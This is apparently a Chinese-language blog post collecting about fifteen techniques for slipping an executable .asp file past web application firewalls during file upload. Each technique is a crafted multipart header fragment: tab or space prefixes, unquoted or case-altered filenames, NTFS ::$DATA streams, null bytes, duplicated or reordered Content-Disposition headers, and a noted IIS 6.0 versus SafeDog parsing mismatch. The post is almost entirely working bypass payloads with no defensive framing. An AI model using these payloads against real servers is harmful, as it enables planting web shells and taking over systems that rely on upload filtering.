上传绕过WAF的tips大全

发表于 | 分类于 |

原始默认状态:

1
2
3
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”backlion.asp”
Content-Type: text/html

突破0,文件名前缀加[0x09]绕过:

1
2
3
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”[0x09]backlion.asp”
Content-Type: text/html

突破1,文件名去掉双引号绕过:

1
2
3
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=backlion.asp
Content-Type: text/html

突破2,添加一个filename1的文件名参数,并赋值绕过:

1
2
3
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”backlion.asp”;filename1=”test.jpg”
Content-Type: text/html

突破3, form变量改成f+orm组合绕过:

1
2
3
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: f+orm-data; name=”filepath”;filename=”backlion.asp”
Content-Type: text/html

突破4 ,文件名后缀大小写绕过:

1
2
3
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.Asp”
Content-Type: text/html

突破5 ,去掉form-data变量绕过:

1
2
3
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: name=”filepath”; filename=”backlion.asp”
Content-Type: text/html

突破6,在Content-Disposition:后添加多个空格 或者在form-data;后添加多个空格绕过:

1
2
3
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data                                 ; name=”filepath”; filename=”backlion.asp”
Content-Type: text/html

或者:

1
2
3
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition:                                                                                form-data ; name=”filepath”; filename=”baclion.asp”
Content-Type: text/html

突破7 ,backlion.asp . (空格+.)绕过:

1
2
3
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp .”
Content-Type: text/html

突破8 ,“回车换行,绕过:

1
2
3
4
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp
Content-Type: text/html

突破9 ,NTFS流 在文件名后加::$DATA绕过:

1
2
3
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp::$DATA”
Content-Type: text/html

或者

1
2
3
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp::$DATA\0x00\fuck.asp0x00.jpg”
Content-Type: text/html

突破10, 经过对IIS 6.0的测试发现,其总是采用第一个Content-Disposition中的值做为接收参数,而安全狗总是以最后一个Content-Disposition中的值做为接收参数。因此尝试构造如下请求[上传backlion.asp成功]:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
Content-Disposition: form-data; name=”FileUploadName”; filename=”backlion.asp”
 
 
—————————–15377259221471
 
 
Content-Disposition: form-data; name=”FileUploadName”; filename=”backlion.txt”
 
Content-Type: application/octet-stream
 
 
Content-Disposition: form-data; name=”FileUploadName”; filename=”backlion.asp”
Content-Disposition: form-data;
name=”FileUploadName”; filename=”backlion.asp”

突破11,将Content-Type和ConTent-Disposition调换顺序位置绕过:

1
2
3
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Type: text/html
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp”

突破12,在文件名前缀加空格(tab键可替换)绕过:

1
2
3
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=    “backlion.asp”
Content-Type: text/html

突破13,在form-data加空格绕过:

1
2
3
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data;      name=”uploaded”; filename=”backlion.asp”
Content-Type: text/html

突破14,在form-data的前后加上+绕过:

1
2
3
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: +form-data; name=”filepath”; filename=”backlion.asp”
Content-Type: text/html

或者:

1
2
3
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data+; name=”filepath”; filename=”backlion.asp”
Content-Type: text/html